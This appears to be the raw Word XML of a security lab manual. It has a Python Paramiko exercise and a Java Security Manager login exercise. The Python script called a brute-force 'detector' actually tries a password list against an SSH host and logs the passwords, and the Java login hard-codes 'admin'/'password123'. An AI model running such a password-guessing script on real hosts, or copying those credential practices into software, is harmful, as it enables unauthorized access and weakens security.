        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1079"/>
        </w:tabs>
        <w:spacing w:before="276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prompt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70440F62" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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Paramiko:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E0F15C3" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="14"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23C2E116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paramiko</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0641DD97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27DEA01B" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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installation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B0F2C5" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="14"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="795E2390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-c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"import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paramiko;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print('Paramiko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installed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successfully')"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B874DC4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00BF14D3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Brute-Force</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> Detection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D8E941B" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="9"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21D4A528" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="62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 script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2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>ssh_brute_force_detector.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D0AA32" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="62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spacing w:val="-4"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="611E48FB" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="17"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61E2B919" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="1080" w:right="7261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paramiko import socket import logging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E3CDD8" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="225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Configure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logging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B5CC88A" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="2"/>
        <w:ind w:left="3481" w:hanging="2401"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>logging.basicConfig(filename="ssh_brute_force.log",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level=logging.INFO, format="%(asctime)s - %(message)s")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21860D48" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EB85102" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="1560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detect_brute_force_attempts(server_ip,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port,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password_list): """Detects failed SSH login attempts using Paramiko."""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70088900" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="204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password_list: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="127CA596" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="1"/>
        <w:ind w:left="2520"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">client = paramiko.SSHClient() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">client.set_missing_host_key_policy(paramiko.AutoAddPolicy()) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>client.connect(server_ip, port=port, username=username,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E92436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password=password,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pacing w:val="-2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>timeout=5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="551F18B6" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:line="226" w:lineRule="exact"/>
        <w:ind w:left="252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client.close()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2503E9F1" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="1"/>
        <w:ind w:left="2520" w:right="1849"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>print("Login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successful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password:",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password) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="223284A4" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:line="225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paramiko.AuthenticationException:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07174300" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:spacing w:line="225" w:lineRule="exact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720C0D" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="83"/>
        <w:ind w:left="1080" w:right="783" w:firstLine="144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logging.info(f"Failed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login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attempt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{username}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with password: {password}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C451948" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="1"/>
        <w:ind w:left="2040" w:right="2701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print("Failed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login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attempt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detected.") except socket.error:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E7885E" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="2520" w:right="2701"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>logging.error("Connection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error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 xml:space="preserve">occurred.") </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A67543E" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="226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usage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29179D0D" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="2"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server_ip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"192.168.1.1"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F0BCFD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port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5"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>22</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="738EF167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username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"admin"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DCFDECC" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="1" w:line="480" w:lineRule="auto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password_list = ["password123", "admin123", "letmein", "123456"] detect_brute_force_attempts(server_ip,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port,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password_list)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA324FB" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="47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1FCE881A" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="61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brute-force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login </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>attempts:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51481BE5" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="17"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="566300D9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ssh_brute_force_detector.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F246AD0" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="48"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23226935" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>ssh_brute_force.log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failed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attempts:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A2AE034" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="9"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59E835CE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cat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ssh_brute_force.log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C65170C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0D3200D4" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Expected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Outcome:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>◻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detects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attempts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providing insight into potential brute-force attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="525673D8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A71376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756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 xml:space="preserve">Manager </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>policies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A28894" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="5"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B5E997D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273336D7" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="360" w:right="783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enforcing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Security Manager policies to restrict unauthorized access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72CB9544" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="8"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="072A56A1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7E4A1AF4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7BF8F2E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188AA5D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Command Line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(Windows/Linux)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A08E593" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="9"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="625C0248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7ED061BD" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="4"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B428AD8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Manager</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D54B9F" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="60"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:spacing w:before="274"/>
        <w:ind w:right="56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enforce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restricting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file access and network operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC2F3B8" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="60"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1079"/>
        </w:tabs>
        <w:spacing w:before="10"/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.policy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>) 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actions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="710CB554" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="27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rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>File</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F954F67" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="10"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E13EDDE" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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secure.policy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content:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D995A7B" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="6"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F30EBD6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grant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22D451B4" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="1560" w:right="783"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>permission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java.io.FilePermission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"login.txt",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"read,write"; permission java.lang.RuntimePermission "exitVM";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="464F1B84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 w14:paraId="63DF6879" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="51"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CB7DBC7" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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and writing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rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>login.txt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permits</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>JVM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exit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04771167" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="27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Login System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4"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E3410E" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="10"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3743AF78" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="58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 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>SecureLogin.java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AAF7253" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="58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4"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C1AAEC" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="17"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BC71898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java.io.*;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0007589D" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="1080" w:right="3449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java.security.AccessControlException; import java.util.Scanner;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34DF26E6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6FE4114E" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="1"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SecureLogin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1B78DD51" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="2040" w:right="2222" w:hanging="48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main(String[] args) { System.setSecurityManager(new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SecurityManager()); String correctUsername = "admin";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06CF2932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correctPassword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"password123";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="546C228D" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="226"/>
        <w:ind w:left="2040" w:right="3449"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Scanner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scanner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Scanner(System.in); System.out.print("Enter username: "); String username = scanner.nextLine(); System.out.print("Enter password: "); String password = scanner.nextLine();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53766EB0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812C42" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="83"/>
        <w:ind w:left="1080" w:firstLine="96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if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(username.equals(correctUsername)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&amp;&amp; password.equals(correctPassword)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="538B9D0B" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="1"/>
        <w:ind w:left="2520" w:right="3057"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>System.out.println("Login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Successful!"); try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E148A43" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="3001"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>FileWriter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writer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FileWriter("login.txt",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true); writer.write("User " + username + " logged in</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6508F46B" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="1"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successfully.\n");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2395A309" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:line="226" w:lineRule="exact"/>
        <w:ind w:left="3001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writer.close();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E9C54E7" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="3001" w:right="426" w:hanging="481"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>} catch (AccessControlException e) { System.out.println("Security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Exception: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write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access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E720A72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0779CD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denied!");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D884C3" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="column"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A6A1E22" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="1"/>
        <w:ind w:left="680" w:right="4918" w:hanging="481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(IOException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{ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>e.printStackTrace();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6412CA67" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr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81" w:space="40"/>
            <w:col w:w="8119"/>
          </w:cols>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FEBB945" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:line="226" w:lineRule="exact"/>
        <w:ind w:left="252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12F5C77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20FB1740" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:line="226" w:lineRule="exact"/>
        <w:ind w:left="252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System.out.println("Invalid</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="21"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Credentials!");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB7B9CE" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="1" w:line="226" w:lineRule="exact"/>
        <w:ind w:left="20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25FFF95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scanner.close();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27DCD89D" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="2"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E6EBE93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991E870" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D8F0520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Compiling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Program</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C480CF" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="478E330E" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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program:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35498039" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="14"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FC8D6E8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SecureLogin.java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E97812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35B012B2" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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enabled:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ECA0D6E" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="15"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68721BD6" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="1080" w:right="783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-Djava.security.manager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 xml:space="preserve">-Djava.security.policy=secure.policy </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>SecureLogin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA2C9A3" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="47"/>
        <w:rPr>
